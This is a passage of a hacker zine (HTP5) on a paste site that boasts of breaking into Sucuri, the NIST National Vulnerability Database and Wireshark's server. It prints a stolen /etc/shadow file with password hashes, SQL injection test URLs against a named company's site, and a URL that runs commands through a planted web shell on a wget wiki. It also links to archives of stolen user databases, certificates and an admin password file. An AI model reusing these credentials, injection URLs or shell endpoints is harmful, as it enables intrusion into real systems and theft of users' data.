  721. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  722.  
  723. lol
  724.  
  725.  
  726.  
  727. ▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄
  728. ██ ██ ██ ██ ██ ██ ██▄▄█ ██ HTP5
  729. ██▄▄▄▄▄▄ ██▄▄██ ██▄▄▄ ██▄▄██ ██ ▀▄▄▄▄▄██▄▄▄
  730. ██
  731. ▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  732.  
  733. "Sucuri is a company that offers a security service that detects unauthorized
  734. changes to network (cloud) assets, including web sites, DNS, Whois records, SSL
  735. certificates and others. It is also heavily used as an early warning system to
  736. detect Malware, Spam and other security issues on web sites and DNS hijacking."
  737.  
  738. Sucuri, why didn't you announce that you got owned? Pretty useless warning
  739. system, if you ask us.
  740.  
  741. [root@sucuri www]# uname -a
  742. Linux sucuri.net 2.6.39.1-linode34 #1 SMP Tue Jun 21 10:29:24 EDT 2011 i686 i686
  743. i386 GNU/Linux
  744.  
  745. 2001, here we come
  746. [root@sucuri www]# cat /etc/shadow
  747. root:iFvywDsrRwmjI:15755:0:99999:7:::
  748. bin:*:14746:0:99999:7:::
  749. daemon:*:14746:0:99999:7:::
  750. adm:*:14746:0:99999:7:::
  751. lp:*:14746:0:99999:7:::
  752. sync:*:14746:0:99999:7:::
  753. shutdown:*:14746:0:99999:7:::
  754. halt:*:14746:0:99999:7:::
  755. mail:*:14746:0:99999:7:::
  756. news:*:14746:0:99999:7:::
  757. uucp:*:14746:0:99999:7:::
  758. operator:*:14746:0:99999:7:::
  759. games:*:14746:0:99999:7:::
  760. gopher:*:14746:0:99999:7:::
  761. ftp:*:14746:0:99999:7:::
  762. nobody:*:14746:0:99999:7:::
  763. vcsa:!!:14746:0:99999:7:::
  764. ntp:!!:14746::::::
  765. sshd:!!:14746::::::
  766. dre:mAuUxgVOcOeAE:15678:0:99999:7:::
  767. apache:!!:14898::::::
  768. mysql:!!:14898::::::
  769. mailnull:!!:14946::::::
  770. smmsp:!!:14946::::::
  771. ossec:!!:15461:0:99999:7:::
  772. ^ OSSEC? Here, We're sure you'll get a kick out of this:
  773.  
  774. TrendMicro (owns OSSEC) DB access via SQLi:
  775. http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=5
  776. http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=4
  777.  
  778. Included in this segment of HTP5 are the databases of Sucuri's primary site,
  779. though labs.sucuri.net and the rest of their VPS's were also compromised.
  780.  
  781. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  782. ~ http://mirror.hack-the-planet.tv/HTP-5/Sucuri/dbs.tgz
  783. |- 2.1MB | Sucuri WP DB's
  784. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  785. "GREGORY D. EVANS, BABY! NUMBA 1!"
  786.  
  787. ░░░▒▒▒▒░░░░░░░
  788. ░░▒▒▒▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
  789. ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒▒░░
  790. ░▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒░
  791. ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▓▓▒▒▒▒▒
  792. ▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒░
  793. ▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒
  794. ▒▒▒▒▒▒▒▒░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒
  795. ▒▒▒▒▒▒▒░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
  796. ░▒▒▒▒▒▒░░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
  797. ▒▒▒▒▒▒▒░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
  798. ▒▒▒▒▒▒▒▒░░░░░░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
  799. ░▒▒▒▒▒▒▒▒░░░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓░
  800. ▒▒▒▒▒▒▒░░░░░░ ░░ ░░░ ░░░▒▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓░
  801. ▒▒▒▒▒▒▒░░░░░░ ░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
  802. ░▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒▒
  803. ░▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░▒▒▓▓▓▓▓▓▒▒░▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
  804. ▓▓▓▒▓▓▓▓▓▓▓▓▓▓▒▒░░░░▒▓▓▓▓▓▓▒▓▄▓▓▓▓▓▓▓▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓░
  805. ▒▓▓▓▓▓░▒▒▓▓▓▓▓▓▒░ ░▒▒▒▒▒▒▒░░▒▒▒▒▓▓▒▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▒▒▒░
  806. ▒▒▓▓▓▓▄▓▓▓░░▒▒▒▒░ ░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒░▒░
  807. ▒▒▒▓▓▓▒▒▓▒▒░░▒▒▒░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒▒░
  808. ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▓░
  809. ▒▒▒▒▒▒▒░░░░▒▒░░░ ░░░░░▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ ▒
  810. ▒▒▒░░░░░░░░▒░░░░ ░░ ░░▒▒▓▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒
  811. ▒░░░░░░░░░▒▒▒▒▒░░▒▒▓▓▓▓▓▓░░░░▒▒░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓
  812. ▒▒░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒░░░░▒▒▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒
  813. ▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▒▓▒▒▒▒▒▒▒▒▓▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▒
  814. ▒▒▒▒▒▒░░▒▒▓▓▓▓▒▒▒░░░░░▒▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█████▓▓▒
  815. ▒▒▒▒▒▒▒▓▓▓▒▒▓▓▒▒▒░░░░░░▒▒▓▓▓▒▒▒▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒███████▓▓▒▒
  816. ▓▓▓▓▓▓▓▓▓▓▓▓▓▒░ ░░▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓░░▓█████████▓▓▓▒
  817. ▓▓▓▓▓▓▓▓▒▓▓▒▒░ ░░░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒██████████████
  818. ▓▓▓▓▒▒▒▒▒▒▒░░░ ░░▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▒ ▓██████████████
  819. ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓░ ░▓██████████████
  820. ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░ ▓▓██████████████
  821. ▓▓▓▓▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓█▓▓▓▓▓▓░ ▒▓███████████████
  822. ▓▓▓█▓▓▓▒▒▒▒░░░░░░░░▒▒▓▓▓▓▓█▓▓▓▓▒░ ░▓▓███████████████
  823. ▓▓▓███████▓▓▓▓▓▓▓▒▓▓▒▓▓▓▓▓▓██▓▓▓▓▒ ░▓▓████████████████
  824. ▓▓████████████▒▒▓▓▓▓▓▓▓▓▓▓████▓▓▓▒░ ▓▓█████████████████
  825. ▓▓▓███████████████▓ ░▒▓▓▓██████▓▓▓▒ ▓▓██████████████████
  826. ▓▓▓████████████████████▒ ░▒▓▓▓██▓▒ ▓▓███████████████████
  827. ▓▓▓███████████████████████▓░ ░▓▒ ▒▓▓███████████████████
  828. ▓▓▓▓███████████████████████████▒ ▓▓▓ ▒▓█████████████████████
  829. ▓██████████████████████████████▓░ ▓▓▓▓▒ ░▓▓█████████████████████
  830. ███████████████████████████████▓░ ▓▓▓▓▓░▓░ ▓▓▓█████████████████████
  831. ███████████████████████████████▓ ░▓▓▒▒▓▒▓▓▒ ▓▓▓██████████████████████
  832. ███████████████████████████████░ ▒▓▒▒░▓▓▓░ ▒▓▓███████████████████████
  833. ███████████████████████████████▒ ▓▓▒░░▓▓░ ░▓▓████████████████████████
  834. ███████████████████████████████▒ ░▒▒▒▓▓▓▓▒ ░▓▓█████████████████████████
  835. ██████████████████████████████▓▓ ░▒▓▒▓▓▓▒▒▒ ▓▓██████████████████████████
  836. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  837.  
  838.  
  839. ▄▄ ▄▄ ▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄ ▄ ▄▄▄
  840. ███▄ ██ █ █▄▄▄ █ ▄▄▄ ███▄ ██ █ █ █ █ HTP5
  841. ██ ▀█▄██ █ ▄▄▄█ █ ██ ▀█▄██ ▀▄▀ █▄▄▀
  842. ██ ▀██ ██ ▀██
  843. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  844.  
  845. GILL
  846. However, we have come to believe that one 'HTP'
  847. is involved in the NVD breach. They or perhaps
  848. an accomplice of theirs have a disk that Mr.
  849. Belford needs. We want you to help us find it.
  850.  
  851. \
  852.  
  853. ░░▒▒▓▓▓▓▓▓▓▓▓▒▒░░
  854. ░▒▓███████████████████▓▒░
  855. ░▒▓█████████████████████████▓▒░
  856. ░▓████████▓▓▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓█████▓
  857. ░▓█████▓▓▓▓▒▒▒░░░░░░░░░░▒▒▒▒▒▓▓▓███▓
  858. ░▓████▓▓▓▒▒▒▒▒▒▒░░░░ ░░░░░▒▒▓▓▓██▓
  859. ▓████▓▓▒▒▒▒▒▒░░░░ ░░▒▒▒▓▓▓██▒
  860. ▒████▓▓▓▒▒▒▒▒░░░ ░▒▒▒▓▓▓██
  861. ▓████▓▓▒▒▒▒▒▒░░░ ░░▒▒▒▓▓▓█░
  862. █████▓▓▒▒▒▒▒░░░ ░░▒▒▒▓▓█▒
  863. ████▓▓▒▒▒▒▒▒▒▒▒░░ ░░▒▒▒▒▓▓▓▓
  864. ███▓▓▒▒▒▒▒▒▒░░░ ░░░░▒▒▒▓▓▓▓
  865. ▓█▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▄░ ░▄▓▓▓▓▓▓▓▓▓█▓▓▓
  866. ▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▓█▒▓▒▓▒▓▓▓▓▓▓▓▓▓▓█▓█░
  867. ▒▓▓▓▓▒▒░░▒█▓▓▓▓▓▓▓▓▓▓█░▒░░▒▓▓▓▓▓▓▓▓▓▓▓█▓▓
  868. ░▒▓▓▒▒▒▒░░▒▒█▓▓▓▓▓▓▓▓▓█░▒░░░▒▓▓▓▓▓▓▓▓▓▓█▒▓░
  869. ▒▒▒▒▒▒▒▒▒▒▒░░▀▀▀▀▀▀▀ ░▒░░ ░▒▒▒▀▀▀▀▀▀▒▓▓▓▒
  870. ░▒▒▒▒▒▒▒▒▒░░ ░░░ ░░▒ ░░▒▒▒▓
  871. ▒▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░░░░ ░░▒▓▒
  872. ░▒▒▒▒▒▒▒▒▒░ ░░░░░ ░▒░░░ ░▒▒▓
  873. ░▒▒▒▒▒▒▒▒░░░░ ░░░░▒▒▒▒░░░░░▓▓▒░░ ░░░▒▓▓
  874. ░░▒▒▒▒▒▒░░░░░░▒▒▓▒░░░░░░░░░░░▒▓▓▓▒░░▒▒▓▓▓░
  875. ░▓▒▒▒▒▒░░░░░░░▒▓▓▒░░░ ░░▒▓▓▓▓▒▒▒▓▒▓░
  876. ▓▓▓▒▒▒▒░░░░░░▒▓▒░░ ░░░░ ░░░░░▒▒▓▓▒▒▒▒▒▓
  877. ▓▓▓▓▒▒▒░░░▒▒▒▒░ ░░▒▒▓▒▒▒▒▒░░▒▒▒▒▓▒▒▒▒▓▒
  878. ▓▓▓▓▓▒▒▒▒▒▒▒▓▒ ░░░░░░░░ ░▒▒▒░░▒▓▒▒▓▓
  879. ▒▓▓▓▓▓▒▒▒▒▒▒▓▒░░░░ ░░░░░░░▒▒▒▒▓▓▒▓▓▒
  880. ░░▒▒▓▓▓▓▒▒▒▒▒▒▓▒░░░ ░░▒▒▓▓▓▓▓▓▓
  881. ░ ▒▒▓▓▓▓▒▒▒▒▒▓▓▒▒░░░ ░░▒▒▒▒▓▓▓▓▒▓
  882. ░▒ ░▒▒▓▓▓▓▒▒▒▒▓▓▒▒▒░ ░▒▒▒▓▓▒▓█▓▒ ░░
  883. ░██░ ░▒▒▓▓▓▓▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▒▓▓▓▓▒ ░
  884. ▒████░ ░▒▒▓▓▓▒▒▓▓▓███████▓▓▓▓▓▓▓▓▒ ▓▒░
  885. ▒▓██████▒ ░▒▒▓▓▓▓▓▓▓█▓▓▓██▓▓▓▓▓▒▒▒ ▓███▓▓▒▒░░
  886. ░▒▓██████████▓ ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒ ░██████████▓▓▓▒▒░░
  887. ░▒▓███████████████▓ ░░░░▒▒▒▒▒▒▒▒░░▒░ ▒█████████████████▓▓▒
  888. ░▒▓▓████████████████████▓░ ▓▓▓▓░▓▓▓░░░ ████████████████████
  889. ██████████████████████████▓░ ▓▓▓▓▓▓░ ▒███████████████████
  890. ████████████████████████████▒ ▓▓██ ▓██████████████████
  891. █████████████████████████████▒ ████ ░██████████████████
  892. ██████████████████████████████▒ ▀████ ▒█████████████████
  893. ███████████████████████████████▓ █████ █████████████████
  894. ████████████████████████████████▓ ██████ ▒████████████████
  895. █████████████████████████████████▓ ███████ ▓███████████████
  896. ██████████████████████████████████▓░ ████████ ░▓██████████████
  897. ████████████████████████████████████░ ▓████████ ▒██████████████
  898. █████████████████████████████████████░ █████████ ██████████████
  899. ██████████████████████████████████████▒ █████████ ▓█████████████
  900. ███████████████████████████████████████▒ ██████████ ░█████████████
  901. ████████████████████████████████████████▓ ▒██████████ ▓████████████
  902. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  903.  
  904. About 8 months ago, we were monitoring our intel (tail -f'ing PM logs from other
  905. networks) and came across an individual who was pretty skilled with ColdFusion.
  906. After due time, we invited him/her to HTP. He/she ended up manifesting the NULL
  907. RDS 1day POC, which owned the NVD.
  908.  
  909. The NVD realized they were breached, and deleted the shells. Soon after, they
  910. were shelled again. They deleted the shells again. Once again, they were
  911. shelled. The DHS CSD was swift and unrelenting with their execution of the
  912. DELETE key.
  913.  
  914. As fun as this was, the rest of HTP acknowledged what had been breached. We
  915. switched tactics and proceeded to traverse the National Vulnerability Database
  916. network. Two boxes down, we downloaded the CFM scripts and certificates hosted
  917. within the NVD and NISTWEB servers. From them, we were able to authenticate
  918. ourselves to access the DHS NIST/NVD user database (root slash period workspace
  919. slash period garbage period).
  920.  
  921. Not knowing what to do, and realizing their DELETE key training had abandoned
  922. them, the DHS CSD resorted to shutting the entire site down. It is our theory
  923. their inspiration for this technique came from an NCIS episode:
  924. http://www.youtube.com/watch?v=u8qgehH3kEQ
  925.  
  926. Included in this segment of HTP5 is the DHS NIST/NVD user database, along with
  927. two certificates and their ColdFusion admin password.properties. Enjoy.
  928.  
  929.  
  930. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  931. ~ http://mirror.hack-the-planet.tv/HTP-5/NVD/NVD.zip
  932. |- 0MB | DHS NIST/NVD user database, two certs, CF admin password.properties
  933. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  934.  
  935.  
  936. ███ ███ ▄████ ▄▄████▄▄ ███ ███
  937. ███ ███ ▄█████ ▄██▀ ▀██▄ ███ ███
  938. ███ ███ ▄██▀███ ███ ███ ███ ███
  939. ██████████ ▄██▀ ███ ███ ███▄███ W
  940. ███ ███ ▄██▀ ███ ███ ████████ I
  941. ███ ███ ▄██▀ ███ ███ ███ ███ ████ R
  942. ███ ███ ▄██████████ ▀██▄ ▄██▀ ███ ████ E
  943. ███ ███ ▄██▀ ███ ▀▀████▀▀ ███ ████ S
  944. H
  945. A
  946. _____ R
  947. ███████████ ███ ███ ██████████ ,-:` \;',`'- K
  948. ███ ███ ███ ███ .'-;_,; ':-;_,'.
  949. ███ ███ ███ ███ /; '/ , _`.-\
  950. ███ ██████████ ███████ | '`. (` /` ` \`|
  951. ███ ███ ███ ███ |:. `\`-. \_ / |
  952. ███ ███ ███ ███ | ( `, .`\ ;'|
  953. ███ ███ ███ ███ \ | .' `-'/
  954. ███ ███ ███ ██████████ `. ;/ .'
  955. `'-._____.-'`
  956.  
  957.  
  958. ███████▄▄ ███ ▄████ ███▄ ███ ██████████ ███████████ /""-._
  959. ███ ▀██▄ ███ ▄█████ ████▄ ███ ███ ███ . '-,
  960. ███ ███ ███ ▄██▀███ █████▄ ███ ███ ███ : '',
  961. ███ ▄██▀ ███ ▄██▀ ███ ███▀██▄ ███ ███████ ███ ; * '.
  962. ███████▀▀ ███ ▄██▀ ███ ███ ▀██▄███ ███ ███ ' * () '.
  963. ███ ███ ▄██▀ ███ ███ ▀█████ ███ ███ \ \
  964. ███ ███ ▄██████████ ███ ▀████ ███ ███ \ _.---.._ '.
  965. ███ ████████ ▄██▀ ███ ███ ▀███ ██████████ ███ : .' _.--''-'' \ ,'
  966. .._ '/.' . ;
  967. ; `-. , \'
  968. ; `, ; ._\
  969. ; \ _,-' ''--._
  970. : \_,-' '-._
  971. \ ,-' . '-._
  972. .' __.-''; \...,__ '.
  973. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 0x06 ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄.' _,-' \ \ ''--.,__ '\
  974. / _,--' ; \ ; "^.}
  975. For the final segment of HTP5, we present: Wireshark. ;_,-' ) \ )\ ) ;
  976. / \/ \_.,-' ;
  977. Debian, Python, Wireshark, Mercurial, MoinMoin, and Wget / ;
  978. were all compromised by moinmelt.py, our RXE 0day for ,-' _,-'''-. ,-., ;
  979. MoinMoin (included in HTP5). Hell, Wget is still ,-' _.-' \ / |/'-._...--'
  980. shelled. Would someone please update them? It's been :--`` )/
  981. months by now:
  982.  
  983. http://wget.addictivecode.org/Wget?action=moinexec&c=uname%20-a
  984.  
  985. We had our sights set on backdooring Mercurial, which
  986. would land us shells on UnrealIRCd (3rd time!), Firefox,
  987. QuakeNet, Pidgin, and Debian repositories. However, we
  988. were more interested in having fun, so instead we dropped
  989. into Wireshark's server.
  990.  
  991. After 24 hours, Wireshark's server 'splash' returned a shell.
  992. It featured a 3.7 kernel and an Apache httpd, which hosted
  993. both the blog and the wiki. Permissions were read-world on
  994. the config files, and we couldn't help ourselves. We then
  995. proceeded to monitor Wireshark's www-data mail, as well as
  996. download their user databases. All of the above is included
  997. in the concluding segment of HTP5. Enjoy your corporate
  998. security access.
  999.  
  1000.  
  1001. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  1002. ~ http://mirror.hack-the-planet.tv/HTP-5/Wireshark/wireshark.zip
  1003. |- 1.3MB | 31MB compressed Wireshark data
  1004. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  1005.  
  1006.  
  1007. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  1008. ▄▄▄▄▄
  1009. █ █ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ HTP5
  1010. █ █ █ █ █ █▄▄█ █ █
  1011. █▄▄▄█ █▄▄█ █ █ ▀▄ █▄▄█
  1012. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  1013.  
  1014.  
  1015. We've come a long way since we first showed up on the Scene. Current and past
  1016. crew of Hack The Planet, we appreciate your kickass effort that got us to this
  1017. point. Since our inception, we have unfortunately witnessed a few of our crew
  1018. members getting arrested. To them, we regret what has transpired, and wish you
  1019. all the best beyond HTP.
  1020.  
  1021. This zine, like all of the others, has been a blast to create. Those interested
  1022. can check out http://straylig.ht/ for past releases.
  1023.  
  1024. Here's to two years of HTP, everyone. Remember; relax, have fun, be the best,
  1025. and DDoS Anonymous on sight.
  1026.  
  1027. Hack the Planet!
  1028.  
  1029.  
  1030. Shout Outs To:
  1031. > ACiD (colored ANSI)
  1032.  
  1033.  
  1034.  
  1035. .
  1036. .
  1037. H .
  1038. ░▓▓▓▓▓▓▓▓▓▓▓ . P
  1039. ▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
  1040. ▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
  1041. ▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
  1042. ▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
  1043. ▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
  1044. ▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
  1045. ▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
  1046. |▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
  1047. ▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
  1048. |▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
  1049. \ |▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
  1050. \ ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
  1051. ,-'`▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
  1052. ,` ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
  1053. ▒░ / ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
  1054. ▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
  1055. ▓▒▒▒▒--▒▒░-- ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
  1056. ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
  1057. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF
  1058.  
  1059. © Offensive Security 2011
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement